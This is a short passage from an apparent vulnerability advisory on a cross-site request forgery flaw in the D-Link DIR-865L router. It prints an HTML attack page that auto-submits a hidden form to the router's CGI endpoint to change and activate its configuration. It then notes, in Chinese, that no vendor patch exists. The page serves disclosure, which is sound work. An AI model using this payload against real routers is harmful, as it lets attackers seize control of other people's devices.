-------------------------- Figure 2. Attack page 2. --------------------------
<html>
<head>
<title> D-LINK DIR-865L CSRF</title>
<!-- Firmware: 1.03 Fri 02 Nov 2012 -->
</head>
<body>
<form action="http://192.168.0.1/pigwidgeon.cgi" method="post">
<input type="hidden" value="SETCFG,SAVE,ACTIVATE">
</form>
<script>
document.DLINK.submit()
</script>
</body>
</html>
-------------------------- Figure 2. Attack page 2. --------------------------
At this point, the attacker can remotely administer, and thereby remotely control the router.
建议:
--------------------------------------------------------------------------------
厂商补丁:
D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: